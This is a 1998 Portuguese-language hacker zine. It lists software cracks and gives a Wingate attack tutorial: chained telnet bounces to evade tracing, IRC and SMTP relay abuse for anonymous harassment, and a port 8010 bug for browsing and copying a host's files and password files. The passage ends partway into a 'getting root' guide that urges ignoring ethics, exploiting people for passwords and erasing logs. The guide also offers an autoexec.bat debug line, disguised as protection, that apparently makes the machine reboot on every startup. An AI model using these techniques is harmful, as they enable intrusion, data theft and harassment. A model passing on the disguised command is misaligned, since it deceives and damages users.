Melhor visualizado com edit, pico, joe, vi, etc...
+------\/-----\                          /--------\/----\  /---\_/----------+
| $$$$$  $$$$$ +------------------------+ $$$$$$$$  $$$$|  |$$$$ $$$$$$$$$  |
| $$$$$  $$$$$ [ HackPHR Zine Numero 06 ] $$$$$$$$$ $$$$+--+$$$$ $$$$$$$$$$ |
| $$$$$$$$$$$$                            $$$$  $$$ $$$$$$$$$$$ $$$$   $$$$ |
| $$$$$$$$$$$$  $$$$$$$$ $$$$$$$ $$$  $$  $$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$  |
| $$$$$$$$$$$$       $$$ $$$$$$$ $$$ $$   $$$$$$$$  $$$$$$$$$$$ $$$$$$$$$   |
| $$$$$$$$$$$$  $$$$$$$$ $$$     $$$$$$   $$$$      $$$$$$$$$$$ $$$$   $$$$ |
| $$$$$  $$$$$ $$$   $$$ $$$$$$$ $$$  $$  $$$$      $$$$   $$$$ $$$$    $$$$|
| $$$$$  $$$$$ $$$$$$ $$ $$$$$$$ $$$   $$ $$$$[t11] $$$$   $$$$ $$$$    $$$$|
+-----[ Hack and Phreak Group - HackPHR Zine Numero 06 - Outubro de 1998 ]--+


			 ---	--- --- --- --- --- --- --- ---
			/// A Production from H.P.G Studios \\\
			 ---	--- --- --- --- --- --- --- ---


"I recognize that a class of criminals and juvenile delinquents has
taken to calling themselves 'hackers', but I consider them irrelevant
to the true meaning of the word; just as the Mafia calls themselves
'businessmen' but nobody pays that fact any attention."            
								rab'90


                             "Mess with the bests, die like the rest."
                                                         Movie Hackers


"Many people will say that we are criminals. They say we are criminals
for hacking, pirating radio and TV, for altering telephone lines.We do
what is right inside of us, not because the law says it's right to do."
                                        The Cyberpunk Technical Journal              


"The advancement and diffusion of knowledge is the only guardian of true
liberty."
						James Madison
						4th U.S. President


							"My name is Dump, Core Dump."
									Anonymous


         "Hello. This is Linus Torvalds and I pronounce Linux as Linux."
					Linus Torvalds


                                                 "The truth is a virus."
                                                             Virii Crew


                  
 INTRODUCAO
                  


Ola' pessoal. Mais alguns meses de atraso, mas ateh que enfim o zine estah
pronto para ser lancado. Demos uma reformulada geral no visual e no formato
como o zine eh distribuido. Os sources dos programas ficam agora num dire-
torio separado facilitando o uso e o zine propriamente fica muito mais leve.
Nesta edicao, nao teremos materias sobre virii, pois o nosso 'querido' Cebola
estah ausente, devido a problemas particulares. A nossa HP tb estah de cara
nova.. Confiram muitas coisas interessantes, inclusive uma 'pequena' lista
dos nossos ultimos 30 hacks, 30 cracks, etc... Sem mais papo furado, read it!


									BLAcK MaSK
            
---------------------------------------------------------------------------
Programa         		-	      Tipo       -        Autor(es)       


mIRC 32 5.31                    - No About Crack     - QuIcK_DeAtH
mIRC 32 5.4                     - No About Crack     - QuIcK_DeAtH
Sonic2 (Game Gear)              - Cheat              - QuIcK_DeAtH
Irfan View 32 2.52+             - Registration       - QuIcK_DeAtH
ACDSee 1.4                      - Registration       - QuIcK_DeAtH
Animagic 1.5                    - Registration       - QuIcK_DeatH
Beyond Compare 1.6              - Registration       - QuIcK_DeAtH
GIF Const. Set 1.0              - Registration       - QuIcK_DeAtH
Hedit32 4 NT                    - Registration       - QuIcK_DeAtH
ACDSee 32 2.3                   - Registration       - QuIcK_DeAtH
mIRC 32                         - Registration       - QuIcK_DeAtH
ICQ 98a Beta Dll 1.07           - Kick All           - B0mB4sT1c & QuIcK_DeAtH
ICQ 98a Beta Dll 1.22           - Kick All           - B0mB4sT1c & QuIcK_DeAtH
Hex Works. 32 2.20              - Registration       - B0mB4sT1c & QuIcK_DeAtH 
ICQ 98a Beta Dll 1.26           - Kick All           - B0mB4sT1c
mIRC 32  5.41                   - Validate Any Key   - B0mB4sT1c & QuIcK_DeAtH
Tiles and Tribulation           - Key Gen            - B0mB4sT1c
Acid Draw 1.20                  - Patcher            - B0mB4sT1c
CLine                           - Key Gen            - B0mB4sT1c
Conseal PC FireWall 1.04        - Validate Any Key   - B0mB4sT1c
mIRC 32 4.52+                   - Registration       - B0mB4sT1c
W3file32                        - Key Gerador        - B0mB4sT1c
WhoIs 1.0 Alpha                 - Nag, Time Remover  - B0mB4sT1c
Lords of the Realm II           - No CD, no movies   - B0mB4sT1c 
ICQ 98a Beta Dll 1.07           - Crack 3x1->        - B0mB4sT1c 
                                  IP UnMasker      
                                  Kick All
                                  Auto-add Users
Lords of the Realm 2            - Cheat              - B0mB4sT1c
Aeco ZIP Explorer PRO 95 v2.51  - Time Remover       - B0mB4sT1c
CCZip 3.12.01.Pro               - Key Gerador        - B0mB4sT1c 
MoneyKEY v0.6.0                 - Patcher            - B0mB4sT1c  
Red Alert v1.04 -> RA95.exe     - Patcher


=> TOTAL: 30 cracks releaseds!!!

OBS: Quem quiser ajudar nos crackz, contate-nos ;)


Ļ
           [ Membros Atuais ]             
.                       .                  .
| - Cebola..........cebola_br@hotmail.com  |
. - BLAcK MaSK.........black_mask@usa.net  .
| - The Crow.......thecrow_mail@yahoo.com  |
. - tOneOne........toneone@toneone.8m.com  .
| - xt0rm...................xt0rm@usa.ne   |
. - SycoFluid...........sycofluid@usa.net  .
| - B0mB4sT1c....bombastic@linuxbr.com.br  |
. - [_Hi-Fi_]........zagatti@zipmail.com.br.
|                                          |
. [ Colaboradores e editores temporarios ] .
|                                          |
. - BiGBen.......bigben@biosys.net         .
|                                          |
.                                          .
  Listados por ordem de ingresso no zine  
ļ


                  
 INDEX
                  

01 - Wingates.....................................[SyCoFlUiD]
02 - GeTTinG RoOt RuLeZ...........................[BLAcK MaSK]
03 - Let's Crack!.................................[tOneOne]
04 - Telefonia....................................[xt0rm]
05 - Mirc 5.4 Bug.................................[BiGBen]
06 - Denial of Service............................[SyCoFlUiD]
07 - Dicas para Linux.............................[BLAcK MaSK]
08 - Eletronica...................................[xt0rm]
09 - Bugz.........................................[tOneOne]
10 - Scene Info...................................[tOneOne]
11 - Our Products.................................[tOneOne]
12 - Private Compiler.............................[BiGBen]
13 - Gravando conversas...........................[Hi-Fi]
14 - Mails........................................

                  
 01 - Wingates
                  
    SyCoFlUiD
                     -
					                    


*** =-=-= InTrOdUcAo =-=-= ***


	y0 manows! A ideia de escrever esse texto sobre wingate me veio em uma
de minhas conversas com o meu manow BLAcK MaSK, em q discutiamos as varias              
vunerabilidades e coisas interessantes q davam para  ser feitas com esse
progz. A primeira vista, o Wingate parece um negocio bem lammah mesmo... bem
Rwindows, e no fundo eh isso mesmo! Entao pq catzo eu estou escrevendo sobre
ele?! O motivo estah justamente no fato de ele ser um programa tao lammah e
tao mal planejado: ISSO NOS PERMITE FAZER COISAS MUITO INTERESSANTES E 
UTEIS :)))).
        Bom, pra comecar: que diabos eh WINGATE? Bom, se voce eh lammah o
suficiente  para nunca ter ouvido falar em wingate acho q vou ter que dar
uma breve explicacao ;). Wingate eh um programa feito pela Qbik New Zealand
q permite q vc divida uma conexao discada ou direta a Internet com varios
computadores, e nao apenas com um, como costumamos ver. Assim, se vc tem uma
rede de computadores e um deles tem um modem ligado a uma linha telefonica,
vc pode utilizar o Wingate nesse micro para q todos os micros de sua rede
acessem a Internet, atraves de uma unica conexao discada, um unico IP. Bom,
chega de propaganda :)! Hora de chegar ao ponto q interessa: assim, o Wingate
tranforma esse "computador principal" em um gateway a Internet, por onde
passam os dados de todos os outros micros da rede. Portanto, como vc ja deve
ter imaginado, o wingate funciona como um servidor Proxy e uma "firewall"
(pfffff...wingate? firewall? hauhahuhahuauhauhhua). Sendo um servidor proxy, 
o wingate apresenta uma serie de servicos (proxy daemons) em diferentes portas
TCP e eh nelas que estah o nosso grande objeto de interesse!! Ao trabalho!


*** =-=-= PrOcUrAnDo PoR WiNgAtEz =-=-= ***


	Para se aproveitar das fraquezas e bugs do wingate, a primeira coisa
q vc precisa fazer, obviamente, eh achar na net maquinas rodando o programa.
Bom, primeiro, logicamente, vc precisa saber onde vai comecar a procurar. Os
servidores com Wingate sao muito comuns em provedores rodando SO Micro$hit, ou
seja, Windows NT e Windows 95. Assim, se vc ver um provedor rodando "WAR-FTPD"
:p, tenha-o como um forte candidato de estar rodando Wingate em uma de suas
maquinas. Tambem eh comum a presenca do Wingate em computadores de usuarios
domesticos, mas como esses normalmente possuem IP dinamico e nao deixam seus
micros conectados 24 horas por dia, pode esquecer dos lammahs :)). Ja definido
o provedor onde voce vai procurar, falta arrumar um programa que scanneie o
intervalo de IPs que voce vai especificar. Caso esteja usando Windows 95,
a melhor escolha eh mesmo o wGateScan, disponivel em http://www.warforge.com.
Caso voce queira scannear do seu Linux, da uma passada la na rootshell
(http://www.rootshell.com), dah um search em "wingate" e vai aparecer um
programa do tipo do wGateScan. Vou presumir que voce ja tenha descoberto como
utilizar o programa e portanto, no vou perder tempo e linhas de texto
escrevendo sobre isso. Uma questao importante entretanto, eh COMO que estes
programas realizam a busca. Repare que o wGateScan tem 3 metodos de procura
mas nos soh vamos nos concentrar no primeiro, que eh o mais utilizado.        
	Quem jah debulhou ou mesmo deu um simples portscan num wingate jah 
deve ter conhecimento da classica porta 23 com seu prompt "Wingate>", marca
registrada de qualquer Wingate Proxy. O Scanner tenta conectar na porta 23 de
cada IP do intervalo que voce especificou e, se a conexao for estabelecida,
tenta receber dessa porta o string "Wingate>", indicando entao a existencia 
ou nao do proxy.

**Co0lz!**

        Quando terminar de scannear, o programa te mostra a lista de Ips que
ele encontrou rodando Wingate e PrOnToW :)! Ai Voce jah tem todas as suas
ferramentas!

...4g0r4, p4R4 4 p4rt3 1nT3r3554nt3 @:)...


*** =-=-= !!! AtAkEz E TrUkEz !!! =-=-= ***


1 - TELNET BOUNCE

        Esse eh de longe o ataque envolvendo wingates mais conhecido, mais
simples e dependendo das suas necessidades, o mais util e animal de todos! Seu
funcionamento eh mesmo muito simples: lembra da porta 23 e do prompt Wingate>?
Entao...normalmente prompts existem para que escrevamos algo neles concorda?
Logo, conecte na porta 23 de um Wingate e digite o seguinte:

Wingate> www.qualquerum.com 80
            (host ou IP)  (porta)  

Adivinha soh o que vai acontecer? Sim! Atraves do Wingate, voce se conectara a
outra maquina e nao serah o seu IP a ficar logado em www.qualquerum.com
mas sim o do wingate! AHUAhuaHUAhuAHUauuAUHahuAa! Sentiu soh o poder da coisa?
Ae vai um esquema para voce vizualizar melhor:

SEU MICRO -----------------  WINGATE -------------------- HOST ALVO
(1.2.3.4)                   (5.6.7.8:23)                (10.10.10.10:X)

        Como voce ta vendo, o Wingate age como um intermediario na conexao
entre seu micro e o HOST ALVO. Assim, se eu conectar, por exemplo, em
10.10.10.10:23 (telnet), nao eh o seu IP que ficara logado (1.2.3.4) mas
sim o do wingate (5.6.7.8). Sabe o que que isso quer dizer?

!!! A-N-O-N-I-M-I-D-A-D-E :PPP !!!

        Mas entretanto, apesar de o teu IP nao ficar logado, o FDP do admin do
HOST ALVO pode muito bem ir atras de voce, contactando o ADMIN do wingate e 
cacando seus logs NO PROPRIO WINGATE! O cara tem que ser um cusao total pra 
fazer isso, mas que admin nao eh? A solucao eh fazer um chamado "WINGATE BOUNCE 
CHAIN", o que eh nada mais nada menos que nao apenas um, mas varios wingates 
intermediando sua conexao com o HOST ALVO. Para fazer isso voce vai digitando 
os IPs dos varios wingates nos prompts Wingate>, vai conectando de Wingate em 
Wingate ateh achar que jah eh o suficiente e finalmente entao conectar-se no 
HOST ALVO.
        Imagina soh como vai ser pro pobre do ADMIN?? HAUHuhaUAHuAHUahuAHa!
Ele vai comecar a te perseguir pelos wingates e se tiver energia para ir ateh
a metade, de lah nao vai sair pois vai se deparar com um Wingate que nao loga
as conexoes! Bye Bye r00t MuthaFucka!
        Dessa forma, quando voce for abrir uma secao telnet no host do sujeito
pra tentar rootear a maquina ou fazer qualquer outra coisa que exiga anonimidade,
um Wingate torna as coisas mais seguras ainda pra voce pois mesmo se voce for 
burro o suficiente para nao apagar os logs, o IP logado nao serah o seu, mas sim 
o do WynGayti! :)))).

2 - IRC BOUNCE
 
        Hehehehe! Esse aqui eh realmente um dos mais c00lz tambem, aquele mais
utilizado pela galera do IRC e por aqueles que querem um pouco de privacidade
e seguranca (e nao um monte de lammahs flodando e nukando a toda hora). O
esquema eh parecido com o do ataque anterior: voce se utiliza de uma maquina
rodando Wingate para bouncear o teu IP e colocar o do proxy no lugar. Assim,
voce tem anonimidade no IRC tb! UEHUehuHUhuEHUehuEUeheUHE! Para bouncear no IRC 
voce pode se utilizar de dois metodos, descritos abaixo.

METODO 1 - Telnet Proxy (denovo??!!) :)

        Hehehehe.... aqui estah novamente a porta 23 entrando em cena! Sim, achar
uma porta 23 aberta com um prompt de "Wingate>" abre um leque de possibilidades,
aqui vai uma! Bom, em primeiro lugar, obviamente voce precisa achar uns Wingates 
e quando isso for feito, abra seu cliente IRC (pode ser qualquer um...mIRC...
BitchX... nao importa) e comece a digitar os comandos:

/server xxx.xxx.xxx.xxx 23 (o ip do wingate + a porta que voce deseja conectar,                            
                            a 23 nesse caso)

Entao vai aparecer um monte de coisas escritas na tela e voce da o comando:

/raw irc.xxxxxx.com.br 6667 (o servidor irc que voce quer conectar + sua
                             porta, que normalmente eh a 6667)

        A conexao ao servidor serah iniciada e quando voce receber o aviso de
conexao estabelecida digita os comandos a seguir, substituindo os campos entre <>
por seus dados.

/raw user <nome de usuario> <email> <UID> <digite qualquer coisa>

/raw nick <seu nick>

	E pronto! Hueueueuueueh! Voce ja estah bounceado! Pode dar um whois em
voce mesmo pra conferir: o IP mostrado serah o do wingate e nao o seu proprio!
Eu, SycoFluid, nao gosto muito desse metodo pois pode levar muitas tentativas
ateh q vc consiga conectar e usar o mIRC normalmente. Por isso prefiro bouncear
pelo SOCKS proxy, metodo descrito abaixo

METODO 2 - SOCKS Proxy

	Como ja disse hah algumas linhas atras, prefiro esse metodo do que o 
primeiro pois eh mais simples e ligeiramente masi rapido. Alem disso muitas
redes IRC jah tem ou estao implantando protecoes contra o IRC Bouncing via 
Telnet enquanto esse segundo eh absolutamente legal e nao eh baseado em 
nenhuma "falha de sistema".
	Comecarei dando uma pequena introducao ao SOCKS Proxy. Pelo proprio
nome, voce percebe qual eh a sua funcao e para que eh utilizado. Assim como 
temos o Telnet Proxy, o FTP Proxy e o HTTP Proxy, temos o SOCKS, rodando na 
porta 1080, que serve como proxy para aplicacoes que nao tem um gateway 
especifico para elas. Como exemplo disso temos o ICQ, o mIRC e outros varios. 
Mas eh importante ressaltar que o SOCKS Proxy nao estah presente apenas no 
Wingate, mas tambem em outros varios como o StarTech e o Microsoft Proxy Server. 
Repare no SETUP do seu mIRC q existe suporte a SOCKS como opcao, na guia Firewall. 
Ops! Voce disse Firewall? YepZ! E eh isso mesmo, pois alem do SOCKS Proxy esconder 
o teu IP, colocando o dele no lugar, ainda pode filtrar ou bloquear os DCC's 
entre outras coisas. Pode-se dizer que eh uma "firewall remota" ;))) (pois 
nao estah na sua rede local).
	Eu espero que vc e seus neuronios ja tenham sacado o esquema depois de toda
essa explicacao que eu dei. Bom, na guia Firewall, caso voce tenha o mIRC 5.4, voce
devera optar entre duas versoes de SOCKS: 4 ou 5. A versao 4 estah presente no Wingate
1.1 e no 2.1 enquanto o SOCKS 5 soh foi introduzido na versao 2.1. Se nao tiver certeza
da versao do Wingate, escolha logo SOCKS 4 ou tente os 2. Apos fazer isso voce digita 
o IP ou DNS do Wingate na caixa de texto HOSTNAME e a porta em PORT (normalmente 
jah estah em 1080, que eh a porta padrao do SOCKS, entao desencana).
	Dai entao eh soh conectar normalmente ao seu servidor IRC predileto como voce
sempre faz e entao de um WHOIS em voce mesmo e TATATATATATATATATATATA! Bingo! Estah 
mostrando o IP do Wingate e nao o seu! Ihaaaaaaaa! Mas atencao: como voce nao estah em
conexao direta com o servidor IRC, mas sendo intermediado por um Wingate, espere 
alguma LeRdEzA no seu BATIPAPU :)), assim tambem como no TELNET BOUNCE ATACK.


3 - SMTP RELAY


	Hehehehe! Hora de mudar um pouco de servico e passar para o e-mail!
Como vc deve saber, o protocolo usado por servidores de e-mail no envio de
mensagens via Internet eh o SMTP.

*** Help a Lammah!!: SMTP = Simple Mail Transfer Protocol

        E assim como no caso do SOCKS, se voce tiver atras de uma "firewall rodando
wingate"(pffffff ahuuhauhahuahua) voce vai precisar de algum Proxy daemon que
redirecione seus e-mails para alem da firewall, para a grande e vasta NET!
Desse modo, no Wingate temos um servico de SMTP proxy que realiza uma funcao
chamada relay, redirecionamento traduzindo-se para o portugues. O mail proxy
mantem uma conexao com um servidor de e-mail "real" e dessa forma, atua
exatamente como um gateway a esse SMTP server. E adivinha soh que vantagens vc 
pode tirar disso? UHueuehueheuheuehuehueh...Exato! o Proxy modifica o cabecalho 
da mensagem e coloca o IP dele no lugar do seu e voce ja manjou o esquema neh? 

ANONYMOUS MAIL! Hueeuueueueuhueuheuhuhehu

	Para comprovar, soh mude o seu servidor SMTP nas configuracoes do seu
programa de e-mail para o IP do Wingate (certificando-se antes, obviamente, se
ele estah com o SMTP Proxy ativado) e mande mensagens "limpas e puras" para todos
os sysadmins e lammahs que voce odeia e gostaria de ver com as tripas para fora,
sabendo que eles nao vao saber quem voce eh, e mesmo que suspeitem, nao vao ter 
como provar que eh voce!

UEHuEHuehUEEUheuEH.....Brincadera viu....nao faca isso nao ou voce estarah se 
tornando num lammah

	"Use-o sabiamente meu filho, ou entao iras sentir a ira do senhor!"
                                                    SycoFluid, Versiculo 666


Fica com voce decidir o que eh "sabiamente" nesse caso..hueuheuheuhehuehuhehueuhehe.


4 - A PORTA 8010 (soh funciona em vers. 2.1 e se a porta 8010 estiver ativada!)


	Ateh agora a gente se concentrou em ataques que apenas se utilizavam do 
wingate (bounceando atraves dele), mas nao o tinham como HOST ALVO. AGORA, as 
coisas mudaram um pokinho ueuheueuue :))))....nossa atencao estah totalmente
centrada no wingate, tendo ele como a vitima de nossas diabruras! uehehuehue...
	Vou te dizer meu manow, esse bug eh muito, muito, mas realmente muito
LOOOKKKKKKOOOOOO! Demonstra mesmo a falta de competencia dos programadores do
wingate e rebaixa mais ainda a reputacao deste! 

"Bah! Esse cara deve tar falando de um bugzinho moh lammer que nem funciona!"

	Bom, eh um bugzinho lammer mesmo....voce APENAS PODE LER E COPIAR PRO TEU
MICRO QUALQUER ARKIVO DO HD DO CARA, OU SEJA, AS UNICAS COISAS QUE VOCE NAO
PODE FAZER SAO DELETAR, CRIAR E EXECUTAR PROGRAMAS! AHHhuaUHAhuAHUahuAHUahuA!
Sentiu o poder do bixo? E o pior de tudo: eh ridiculo de facil!! Se isso nao for
demais para os seus neuronios, abra seu browser qualquer e digite:

http://ipdowingate:8010// (isso mesmo...duas barras)

e UAHUahuAHUahuHAUahuHA! Voce tem uma lista completa de todo o HD do cara..com
pastas e tudo! Pra mudar de diretorio eh soh acrescentar o nome da pasta depois
do // (clicar nela no browser nao vai adiantar). Imagina soh esse truquezim pra
pegar os PWL's do cara.....AIIIIIIII :)))! Bom..eeheuuheuue..use sua imaginacao!
	Voce percebeu que agora comecei falando do ataque em si mesmo, da pratica,
mas agora eh hora de falar um pouco do "POR QUE" desse ataque, senao essa materia 
vai ser apenas mais uma materia lammer de uma dakeles zines lammer. Como voce,
a conexao ocorre atraves do protocolo HTTP na porta 8010 do Wingate Host. 

"Tah bom, mas por que serah que esses cars foram tao burros de colocarem uma 
backdoor no proprio programa?"

	UHUueHUheuhe...nao eh bem assim! Na verdade, nessa porta 8010 roda um 
servico conhecido como Logfile Server e a funcao dele eh permitir que o bosta 
do sysadmin veja a distancia os preciosos logs de seu wingate. No lugar das 
duas barras do endereco acima, experimente colocar soh uma (no final). 
Bingowwww...voce vai estar olhando para os diretorios de logs! Mas, ahhhammm, 
acrescentando-se uma barra , voce volta para o diretorio raiz e da raiz, voce 
tem acesso a tudo! Huahuhuahuahuahuahuahuahua!

	Mas ATENCAO LAMMAH: Voce que acha que sabendo esse truquezinho se 
tornara um super-RAKER estah muito enganado! isso eh apenas uma ferramenta 
para voce usar em horas de extrema necessidade, quando estah furioso!

PS.: E como eu jah disse no titulo, o Wingate alvo precisa ser versao 2.1, a 
porta 8010 precisa estar aberta E dando acesso a todos os micros externos 
(sem restricoes) ;). Faca bom proveito!


*** =-=-= !!! TeRmInAnDo... !!! =-=-= ***


	Bom, espero que voce tenha feito bom proveito de todas as informacoes
 que eu pus aqui e AS USE SABIAMENTE! SEM LAMMERZAR! 
	Pesquisando sobre Wingate, reparei que a maioria das informacoes estao 
divididas em diferentes textos, em diferentes sites, de diferentes autores. Um 
dos principais motivos de eu (Sycofluid) ter redigido esse texto foi pelo prazer 
de reunir toda akela informacao em um texto, feito por uma pessoa, e ainda por 
cima, EM PORTUGUES (4mer1c4n SuXz)! Mas nao me leve a mal, nao estou tentando tirar 
credito nenhum das pessoas que descobriram esse bugs/ataques e os publicaram 
para a comunidade underground/sekurity! Eles sao um exemplo de verdadeiros 
fucadores (mesmo que o objeto fucado seja um RUINGAYTI) :)). Com novos bugs 
sendo descobertos e exploits sendo criados a cada dia, mais do que nunca temos 
a oportunidade de debulhar a fundo programas e sistemas e descobrir nos mesmos 
bugz e criar nossos ataques! Moral da historia: FUCE MUITO, NAO FIQUE DEPENDENTE 
DAS DESCOBERTAS DOS OUTROS SENAO VOCE SERAH APENAS MAIS UM WANNABE NO MEIO DE 
UMA INFINIDADE!

OS FUCADORES (fontes consultadas):

Rhino9 Security Team - http://rhino9.ml.org
Hacker's Hideout - http://www.hackersclub.com/km
Lista BUGTRAQ
Rootshell - http://www.rootshell.com

(c) =|SyC0FlUiD|= 


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 02 -  GeTTinG RoOt RuLeZ
                  
    BLAcK MaSK
                     -

                              
#bash cat getroot.txt

l4NgU4G3 = BRaZiLiAn PoRtUgUeSe [SoMeTimEs iN fuCKing eNgLisH]
AuTh0R = BLAcK MaSK [modify thiz line and be the lammest in the planet]
e1/2l = black_mask@usa.net
HP = http://www.blackmask.base.org
D4t3 = some day of May, 1998, 20th Century
0S = UNIX and compatibles (mainly LINUX and AIX)



]iNDEX LiBR0RUM Pr0iBiToRiUm[

*** 1 *** DiScLAmMeR -------------------------- Notice to lamahs and wannabes
*** 2 *** Why did I write this ? -------------- Notes from author
*** 3 *** FUcKiNg NoTiCe ---------------------- Some lamah noise...
*** 4 *** MeU PRiMeiRo PrOgRaMa H4cKeR -------- d
*** 5 *** GeTTinG RoOt RuLeZ ------------------ ACTION NOW!
*** 6 *** L4st w0rds -------------------------- no description


[|{DiScLAmMeR}|]

tHiZ FiLE iSN'T FOR EDUCATiONAL PURPOSES ONLy. iF YOU READ tHiZ SUX TEXT AND
DON'T LEARN OR MAKE ANYTHiNG i THiNK THAT YOU MUST STOP WiTH HACKiNG
ACTiViTiES AND GO FUCK YOURSELF... WiTH A LARGE DICK!

tHiZ TeXt WiLL Be WRiTteN jUsT iN pOrTuGuEsE!
S0, L34RN P0RTUGU3S3 4ND D0M1N4T3 TH3 W0RLD !!! (como diria o pessoal do MoS)

Chega de enrolacao e vamos ao que interessa..



[|{Why did I write this ?}|]


Bem, em primeiro lugar gostaria de esclarecer uma coisinha. O meu intuito com
este texto nao era publicar no zine nem em qualquer outro lugar (talvez na
minha HP). Escrevi-o ESPECIALMENTE para um amigo meu (cujo nome prefiro nao
mencionar) que estava iniciando e pediu a minha ajuda. No inicio era pra ser
apenas um textinho bem beginner, sem se aprofundar em nenhum assunto, mas com
o passar do tempo eu ia pondo mais umas coisas aqui, melhorando lah e percebi
que tinha ficado num tamanho consideravel. Entao, pedi uma avaliacao aos meus
amigos do zine, e recebi varios elogios... Porem, isto pode parecer fraco a
muitos, como apenas um conjunto de receitas de bolo, mas, temos que considerar
que a maioria dos leitores estao ainda engatinhando no hacking e por isso acre
dito que este texto seja de grande valor para eles. Em suma, este texto eh di-
recionado especificamente a quem estah comecando. Se voce acha que jah sabe
tudo e se considera superior aos outros, pule para a proxima materia.



[|{FUcKiNg NoTiCe}|]


        Primeiramente, vou te dar algumas dicas do que fazer... Isto NAO eh
um codigo de conduta muito menos regras! NUNCA siga regras e outras coisas do
tipo: Hackers fazem isso, Crackers akilo. Esqueca tambem as porcarias das
definicoes de cada um. Faca o que der na tua mente and be happy!

1- Nunca ache que sabe tudo, nem se ache o "hacker" pois sempre haverah
muitas coisas a + para se aprender... No comeco vah pegando todos os textos
que ve pela frente principalmente aqueles que ensinam o basico. Normalmente
os textos em ingles sao os melhores, se voce nao sabe ingles aprenda o basico!
Eu disse NORMALMENTE, porque voce pode ver que alguns em portugues como ESTE
tambem sao phodas! ;) Pode parecer totalmente complicado no inicio, mas nao
desista e procure outros textos. Guarde todos os textos que achar
interessante mesmo que nao entenda nada.. Apos um tempo de estudo e dedicacao
volte a ler os mesmos textos que achou complicado e voce verah que as coisas
vao se "encaixando"...

2- Se tiver duvidas ou nao conseguir fazer algo, tente primeiro procurar a
resposta sozinho. Se apos ler umas 20x cada texto, a Barsa completa e pedir
pro pai e pra mae voce nao conseguir soh entao peca pra alguem no IRC. Os
Raquers dos #hackers sao muito "ocupados" pra responderem perguntas basicas e
vao te chamar de lamer. De preferencia entre no #hackphr da Brasnet. Se nao
for uma pergunta lamer, eu respondo! ;)

3- Nao siga "receitinhas" de bolo. Normalmente os bugs jah sao velhos e nem
funcionam mais.. Voce jah deve ter lido algum texto sobre FTP Hacking e nele
falava de um tal bug que voce tinha que digitar $cwd~root e mais umas coisas
e ai pegava o passwd ou algo parecido. Soh que eu acho que a galera raquer do
irc nunca se ligou que este bug nao existe (a nao ser q estejamos em 1989.
Estamos???) e continua tentando.. Pobres lamers... Tente descobrir seus
proprios bugs. Exploite-os!

4- Aprenda programacao! De preferencia Pascal ou C, pois estas sao as
linguagens bases da maioria dos outros programas. Se tiver muita vontade
mesmo, aprenda Assembly.

5- Conheca UNIX como a palma da sua mao. Este eh o sistema mais usado do
mundo em servidores e possui muitas falhas. Depois aprenda sobre VMS, MAC,
NT, etc. E NAO aprenda apenas o basico pra hackear, tente entender como tudo
funciona. Lembre-se: dar um "cat /etc/passwd" nao farah de voce um hacker.

6- Quando jah estiver em nivel mais avancado esforce-se para aprender o
maximo de TCP/IP.

7- Leia todas as zines que pegar. De preferencia Axur05, RWX e HackPHR. Hah..
nao esqueca das americanas e inglesas: Phrack, THTJ, CRH, LOD e System Failure.

8- Passe a maior parte do tempo lendo e aprendendo. Nao queira praticar sem
antes ter uma boa base, e quando chegar a hora da acao tenha certeza de que
serah capaz de fazer tudo sozinho ou hackeie em conjunto com alguem +
experiente.

9- Reformate a particao do teu HD que possui M$D0$ ou rWINDOW$ 95. Instale
LINUX!

10- Use encriptacao. Nao vai querer que os bundoes que trabalham nos
provedores quando nao tem nada pra fazer(como na maioria do tempo) leiam seus
mails incriminadores...

11- Nao puxe o saco de ninguem! Seja + VC! (assim como EU SOU + EU! :-) )

12- Despreze todas as regras e eticas que lhe imporem. Tenha sua propria
etica. Nao tenha doh de fuder ninguem. Se aproveite sempre de um retardado
pra ganhar + uma senha. Se quiser ter um sistema em maos nao compartilhe as
infos e senhas dele com mais ninguem. Nao confie em ninguem. Nao fale dos
seus hacks com nenhum amigo da escola, cidade ou que conheca voce
pessoalmente. Se voce se fuder por causa disso eles vao abrir o bico. Nao
fale sobre hacking no telefone ou em publico. Guarde suas historias e proezas
para voce e seu travesseiro. Se for falar algo, nao envolva nomes, datas ou
qualquer outra prova concreta.

13- Nao use tua conta de internet propria para hackear. Em alguns casos nem
seu telefone.

14- APRENDA E PRATIQUE! NAO SEJA SOH MAIS UM NERD!



[|{MeU PRiMeiRo PrOgRaMa HAcKeR}|]


Ai vai + uma dicazinha pra voce ficar mais protegido, nao ser nukado por
ninguem e poder nukar TODOS que voce quiser. Basta acrescentar a seguinte
linha no seu autoexec.bat

echo g=ffff:0|debug 

Aih feche este texto e reinicie o seu computador.


PS: Nao adianta digitar no prompt do D0$ ou criar um bat e rodar sob o rWIN95!



[|{GeTTinG RoOt RuLeZ...}|]


Primeiro vou te dar uma ENTRODUCAOZINHA sobre o que eh rootear. Ser root de
um sistema na maioria das vezes eh muito bom, seu ego aumenta bastante e voce
se sente com todo o poder. Mas nao eh porque pode fazer tudo como root que
voce vai sair deletando o que ver pela frente. Modifique apenas o necessario
e que nao permita que peguem voce. LOGS! Just thiz! Nao leia mails dos outros!
Eh mais facil voce se fuder porque leu o mail do namorado gay da Maria puta
do que se hackear o provedor inteiro... Hack de HPS soh quando voce jah
estiver em um nivel mais avancado... Se te pegarem por voce ter rooteado ou
algo assim, tenha certeza que nao lhe acontecerah nada (aqui no Brasil) e os
caras ainda vao ficar contentes porque voce mostrou 5% das falhas do sistema
deles, mas se voce hackear a hp eles vao ficar um pouco mais bravos...
hehehe.. hackeie igual! d;P


Este texto vai fugir um pouco do seu proposito inicial e eu vou demonstrar
alguns passos a voce hackear... POR FAVOR, nao me faca perguntas assim : "Nao
entendi nada, me ensina tudo novamente passo a passo de como devo hackear?"
ou "Os caras do provedor X me chamaram de pirralho filhinho de papai metido
com problemas mentais e mandaram eu tomar no cu. Quero fuder eles! Hackeia o
provedor deles pra mim?" ou ainda "Quer ser meu mestre? Eu quero ser seu
discipulo!" Perguntas idiotas como estas merecerao respostas idiotas tambem.
A nao ser que eu esteja de muito bom humor...


---== Passos e informacoes a saber sobre um provedor antes de hackeah-lo ==---


1- Descubra o DNS, dominio, e/ou numero IP dele. LamaHelp: DNS eh a mesma
coisa que n IP? NAO... o DNS eh um protocolo (o IP eh outro) integrante do
pacote TCP/IP e serve como um "conversor" de numeros IP para nomes comuns dos
dominios. Isto serve pra voce nao ter que digitar XXX.XXX.XXX.XXX (numeros),
ao inves, digitarah apenas www.target.sux.br ou ftp.target.sux.br . O Domain
